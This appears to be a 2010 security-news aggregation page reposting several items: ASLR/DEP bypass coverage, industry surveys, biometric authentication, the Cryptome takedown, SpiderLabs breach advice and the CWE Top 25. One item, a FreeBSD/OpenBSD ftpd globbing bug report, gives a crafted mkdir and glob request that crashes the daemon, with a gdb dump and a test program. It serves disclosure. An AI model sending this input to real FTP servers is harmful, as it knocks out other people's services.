uncompiled.com

There are a wide variety of logging functions and services on UNIX. Some of these, such as the Solaris audit facility, are limited to a particular variety of UNIX. It is important that the digital forensics analyst become familiar with the logging deployed on the UNIX system that they are reviewing. In particular, have a look at the syslog configuration file, the “/var/log” and “/var/run” directories and check if there are any remote log servers. Syslog is a network service that is most commonly run locally. This allows for the capability of sharing logs to a remote system.

Source

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said.”But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more dfficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by using a combination of several attack techniques chained together.The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing application to execute data from portions of the memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SeHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source

Brocade’s “man-on-the-street” survey at this week’s RSA conference in San Francisco, revealed that 47 percent of respondents believe their network security solutions are less than 25 percent effective in thwarting security threats. Given the frequency of new attacks on networks every day, it’s clear IT security professionals aren’t feeling prepared.

Of those polled, nearly 20 percent of those surveyed believe their company’s security policies that deal with threats or data leaks are not being enforced effectively, while 80 percent believe the policies are only being “somewhat enforced.” Therefore, regardless of how ironclad a company’s security policies are, enforcing them 100 percent of the time is impossible and can expose a company to outside threats unnecessarily.

When asked about sources of security threats and breaches, 48 percent of those polled identified individuals within their organization providing or selling sensitive information to competitive companies as their most serious security concern; this was followed by concerns about threats posed by foreign governments (15%) and hacking attacks by cyber criminals (10%). Despite the constant threat of foreign entities and governments infiltrating U.S. companies that have made headlines, most security executives’ fears are overwhelmingly focused on internal competitive threats vs. a malicious foreign attack.

Another interesting finding revealed that nearly 40 percent of those surveyed felt background checks on employees were ineffective in determining if that person could be a potential spy for a competitor or foreign government.

The survey polled 144 conference attendees that are involved in the IT security decision making process within a wide variety of industries including networking manufacturing, education, software, healthcare, telecommunications, government and finance.

Source

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its
ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in
popen.c.
I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
glob_t gl;
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
[1] if (glob(argv[argc], flags, NULL, &gl))
gargv[gargc++] = strdup(argv[argc]);
[2] else
[3] for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
pop++)
gargv[gargc++] = strdup(*pop);
globfree(&gl);
}

At [1] glob() is called. if theres a long directory (for example "A" x
200) and a request like described
in "how to repeat this problem" is sent to the ftpd it crashes. My
assumption is because it lands in the
else clause [2], glob doesn't fail but gives back a zeroed out gl
structure. In [3] then there's no check
if pop is null and therefore *pop gets dereferenced which is a null
pointer and the ftpd instance crashes.

Could someone please shed some light into why glob doesn't fail but
gives a zeroed out structure back?

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257
“WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW”
directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
—snip—

on the other side:

—snip—
0×282261e5 in read () at read.S:3
3 RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0×0805622c in getline ()
(gdb) i r
eax 0×0 0
ecx 0×0 0
edx 0×0 0
ebx 0xbfbfd911 -1077946095
esp 0xbfbfba70 0xbfbfba70
ebp 0xbfbfcc08 0xbfbfcc08
esi 0×1 1
edi 0xbfbfcbf4 -1077949452
eip 0×805622c 0×805622c
eflags 0×10293 66195
cs 0×33 51
ss 0×3b 59
ds 0×3b 59
es 0×3b 59
fs 0×3b 59
gs 0×1b 27
(gdb) x/10i $eip
0×805622c : mov (%edx),%eax
0×805622e : setle %cl
0×8056231 : mov %ecx,%esi
0×8056233 : test %eax,%eax
0×8056235 : je 0×8056281
0×8056237 : test %cl,%cl
0×8056239 : je 0×8056281
0×805623b : mov %edx,%ebx
0×805623d : mov 0xffffee7c(%ebp),%edx
0×8056243 : lea 0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
eip = 0×805622c in getline; saved eip 0×805047b
called by frame at 0xbfbfcc14
Arglist at 0xbfbfcc08, args:
Locals at 0xbfbfcc08, Previous frame’s sp is 0xbfbfcc10
Saved registers:
ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at
0xbfbfcc04,
eip at 0xbfbfcc0c
(gdb)

Testing program:

—snip—

#include
#include

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

void do_glob() {
glob_t gl;
char **pop;

char buffer[256];
strcpy(buffer, “{A*/../A*/../A*/../A*/../A*/../A*/../A*}”);

int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
if (glob(buffer, flags, NULL, &gl)) {
printf(“GLOB FAILED!\n”);
return 0;
}
else
// for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
printf("glob success");
return 0;
}
globfree(&gl);
}

main(int argc, char **argv) {
do_glob();
do_glob();
}
---snip---

05 March 2010
/kingcope

Source

In theory, biometrics are a great way to authenticate a user: it’s impossible to lose your fingerprint (barring the most gruesome of developments), you can’t forget it like you could a password, and it’s unique to you.

In practice, though, there are so many things that, for now, limit a more widespread use of this technology.

One of the problems has been pointed out by Guy Churchward, CEO of LogLogic. He says that it is its uniqueness the thing that makes using biometric data an inherently flawed choice for a primary method of authentication.

“Once you have your fingerprint scanned it will give a unique data sequence which if compromised is not exactly something you can change,” he says. “Imagine having an option of only one password ‘ever’. One loss and you are screwed.”

Another problem is that current scanners still can’t recognize if the fingerprint is on a real finger or an artificial one. Andrew Clarke, of e-DMZ Security, says that in theory, one could get a hold of the user’s fingerprint using techniques used in crime detection and transfer it on an artificial finger. This will likely change as the technology evolves, but for now the system is still fallible, and not suitable to be a primary solution to the authentication problem.

“As with all authentication, multiple factors increases the effectiveness of the solution. Something you have (fingerprint) combined with something you know (passcode) provides a stronger solution,” he says.

According to SC Magazine, David Ting, CTO of Imprivata, sees the good side of this kind of authentication. Saying that the contents of any computer should be encrypted, and the access to its content secured by a password AND by biometrics. According to him, a biometric password is infinitely more difficult to recover using a brute force attack than a “normal” password.

He is in favor of using a complex passwords initially to thwart cracking, and as regards the secure access to the Windows logon, biometric, one-time password tokens or smartcards should be used because of the aforementioned reason.

Source

To make better cybersecurity-related decisions a senior FBI official recommends considering a simple algebraic equation—risk = threat x vulnerability x consequence—rather than solely focusing on threat vectors and actors.

Each factor is important, Steven Chabinsky, deputy assistant director at the FBI’s Cyber Division, said today. Chabinsky spoke on a panel at the Armed Forces Communications and Electronics Association Homeland Security Conference in Washington.

Nation-states that commit espionage, terrorist organizations, individuals interested in using the Internet as an attack tool and criminal syndicates are the types of attackers mostly likely to target computer systems in both the public and private sectors, he said. Threat vectors on which the FBI is focused include remote access and intrusion, supply chain vulnerabilities, proximate or close access threats, and insider access threats, he said.

Chabinsky said the risk model is compelling is because risk drops down to zero if any of those three elements or variables is zero. He said the risk model is the first place he goes when he needs to step back strategically.

“Unfortunately, we haven’t gotten to the point where I feel we can maintain at zero any one of those element so we have to constantly figure out as an organization how we are we driving down each of those,” he said.

He added, “If you look through the risk model you’ll find that you have opportunities on the threat vulnerability and consequence management side, and you have to find your partners so that you could work together.”

Source

Young U.S. Internet users are not receiving enough education about being safe online, according to a new poll by the National Cyber Security Alliance (NCSA) and supported by Microsoft.

More than three quarters of teachers have spent fewer than six hours on education related to cyberethics, cybersafety, and cybersecurity in the last 12 months; more than 50% of teachers reported their school districts do not require these subjects as curriculum; and only 35% taught proper online conduct.

Key highlights of the survey include:

*More than 90% of technology coordinators school administrators and teachers support teaching cyberethics, cybersafety and cybersecurity in schools. However, only 35% of teachers and just over half of school administrators report that their school districts require cyberethics, cybersafety, and cybersecurity in their curriculum.

*Low levels of integration of key cyberethics, cybersecurity, and cybersafety topics into everyday instructional activities. For example, only 27% of teachers taught about the safe use of social networks, only 18% taught about scams, fraud and social engineering, and only 19% taught about safe passwords in the past 12 months. Additionally, 32% of teachers indicated they had not taught cyberethics, and 44% of teachers had not taught cybersafety or cybersecurity.

*Differing opinions between teachers and administrators as to who is or should be responsible (parents vs. teachers) for educating students about cyberethics, cybersafety, and cybersecurity. For example, while 72% of teachers indicated that parents bear the primary responsibility for teaching these topics, 51% of school administrators indicate that teachers are responsible.

“The study illuminates that there is no cohesive effort to provide young people the education they need to safely and securely navigate the digital age and prepare them as digital citizens and employees,” said Michael Kaiser, Executive Director of the National Cyber Security Alliance. “Unfortunately, we are not meeting the needs of schools, teachers, or students.

The survey also found schools rely on shielding students instead of teaching behaviors for safe and secure Internet use. More than 90 percent of schools have built up digital defenses, such as filtering and blocking social networking sites, to protect children on school networks. Those measures may help reduce the online risks children face at school, they do not prepare students to act more safely when accessing the Internet at home or on mobile devices.

Source

Cryptome, the whistleblower site that serves as a repository for “documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance”, has been taken down on Wednesday afternoon by its hosting provider, Network Solutions, which also had the domain “legally locked”.

What it means is that domain information can’t be modified and the domain name transferred – only the registration can be renewed. This action from Network solutions was motivated by a Digital Millennium Copyright Act (DMCA) complaint filed by Microsoft against Cryptonome and its owners, regarding the publication of their Global Criminal Compliance Handbook, a document that reveals to users things that Microsoft would not like to become common knowledge.

In it you can find information about what records are retained and for how long, and what information can and will be given to law enforcement and intelligence agencies if requested by subpoena. Microsoft is not the only company whose “spy guide” has been published by Cryptome, but it’s apparently the one with the most clout.

ReadWriteWeb reports that once the complaint was filed and they requested of Paul Young, one of the owners of Cryptome, to take the document off the website, he refused. So the ISP intervened with a warning that said that if the document wasn’t removed by Thursday, they would disable the site. And so they did – one day before the imposed deadline.

In the complaint, Microsoft states as the reason for their request an infringement of copyright laws. The Electronic Frontier Foundation (EFF), the well-known international digital rights watchdog group, spoke up: “We find it troubling that copyright law is being invoked here. Microsoft doesn’t sell this manual. There’s no market for this work. It’s not a copyright issue. John’s copying of it is fair use. We don’t do this anywhere else in speech law.”

Cryptome has been active since 1996, and this is the first time that someone has succeeded in their mission to shut it down. Young has filed a counter-notification, and we probably won’t have to wait long for the next installment of this story. If Microsoft doesn’t forward a notice of litigation, Network Solutions will reactivate the Website and unlock the domain in no more than 14 business days. In the meantime, the website is temporarily available here.

If you want to read Microsoft’s “spy guide”, you can download it at Wikileaks, who has also offered to to host Cryptome on their multi-jurisdictional network-outside the US.

Source

Where computer security is involved, it’s always good to understand the kinds of breaches that companies have suffered and what the actual or suspected vulnerabilities were that allowed the breaches to occur. It is in this spirit that the members of SpiderLabs, the advanced security team within Trustwave, have published their Global Security Report of 2010. The report is based on more than 200 forensic studies and almost 1,900 penetration tests conducted by SpiderLabs in 2009.

For the most part, SpiderLabs’ report is fairly consistent with security breach reports published by other security consultants and investigative agencies. By this I mean that thieves tend to target high-value information such as credit card data, Social Security numbers and other information that can easily be sold in the underground economy. In SpiderLabs’ investigations, point-of-sale software systems were the most frequently breached systems.

Another consistency with other security reports is the fact that many breaches can be traced to known vulnerabilities that had been left unpatched. This further emphasizes the importance of a consistent patch strategy within your organization.

I recently talked with Nicholas Percoco, senior vice president of SpiderLabs, to get his recommendations of strategic initiatives for every organization. If you follow Percoco’s top 10 recommendations, you should vastly improve your company’s risk of a security breach.

1. Perform and maintain a complete asset inventory, and decommission old systems. Knowing precisely what you have is the first step to securing it. Percoco says his team’s investigations frequently find devices that the customer organization doesn’t even know about. In addition, the investigations often turn up old systems that have a planned decommission date. The customers often aren’t concerned about keeping such systems up to date with patches because they are due to be taken off-line soon. Percoco says that in 75% of the cases, those systems slated for decommissioning are still in use a year later –unpatched and more vulnerable than ever.

2. Monitor your third-party relationships. In 81% of the cases the SpiderLabs team investigated, third-party vendors and their products were responsible for introducing vulnerabilities, mostly stemming from insecure remote access implementations and default, vendor-supplied credentials. Percoco advises that you discuss your security policies with your vendors and ensure they adhere to them.

3. Segment your network into as many zones as feasibly possible. If you’ve got a completely flat network, and one device on that network can see or talk to any other device, you’ve got a problem. A hacker gaining entry to this network has easy access to everything. Percoco tells a story about using a network connection in a hotel conference room. From there he was able to see the hotel’s reservations system. Uh oh.

4. Rethink your wireless implementation. Wireless security is a fast-moving target that companies often struggle to keep up with. Percoco recommends you never place wireless access points within your corporate core network; rather, place them outside your network and treat them like any other remote access medium. Your perimeter security should help keep unwanted visitors out.

5. Encrypt your sensitive data. In their investigations, the SpiderLabs team has found clear-text sensitive data quite easily. Best practices dictate that you should understand where data is located, purge what isn’t needed and encrypt the rest, including data in transit.

6. Investigate anomalies — they could be warning signs. Excessive login attempts, server crashes, “noise” from a device: All of these could be signs that someone is doing something unusual and unwanted on your network. At the very least, investigate the anomaly with a suspicious eye as soon as you detect it. Doing so might prevent or limit the damage from a breach.

7. Lock down user access. Most employees do not need the high level of access that they are given. Having too many privileges allows them to do harmful things, either inadvertently or intentionally. Perform an analysis of role and access privileges and lock down as much as you can.

8. Use multifactor authentication everywhere possible. Percoco says we’re too dependent on simply using passwords for authentication. This isn’t good enough anymore. He recommends you deploy multifactor authentication where possible. There are lots of new techniques and technologies to choose from.

9. Implement and follow a formal Software Development Life Cycle (SDLC). SpiderLabs’ experience with penetration testing has shown that many organizations don’t provide enough checks and balances in their software development process. A comprehensive SDLC process is vitally important in the development of secure applications.

10. Don’t forget to educate everyone. IT security is everyone’s responsibility. Percoco says organizations need to implement a mandatory security awareness training program that every employee must attend annually.

Source

The 2010 CWE/SANS Top 25 Most Dangerous Programming Errors is a list of the most widespread and critical programming errors that can lead to serious software vulnerabilities. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.

The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.

The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe. It leverages experiences in the development of the SANS Top 20 attack vectors (http://www.sans.org/top20/) and MITRE’s Common Weakness Enumeration (CWE) (http://cwe.mitre.org/). MITRE maintains the CWE web site, with the support of the US Department of Homeland Security’s National Cyber Security Division, presenting detailed descriptions of the top 25 programming errors along with authoritative guidance for mitigating and avoiding them. The CWE site contains data on more than 800 programming errors, design errors, and architecture errors that can lead to exploitable vulnerabilities.

The 2010 Top 25 makes substantial improvements to the 2009 list, but the spirit and goals remain the same. The structure of the list has been modified to distinguish mitigations and general secure programming principles from more concrete weaknesses. This year’s Top 25 entries are prioritized using inputs from over 20 different organizations, who evaluated each weakness based on prevalence and importance. The new version introduces focus profiles that allow developers and other users to select the parts of the Top 25 that are most relevant to their concerns. The new list also adds a small set of the most effective “Monster Mitigations,” which help developers to reduce or eliminate entire groups of the Top 25 weaknesses, as well as many of the other 800 weaknesses that are documented by CWE. Finally, many high-level weaknesses from the 2009 list have been replaced with lower-level variants that are more actionable.

Source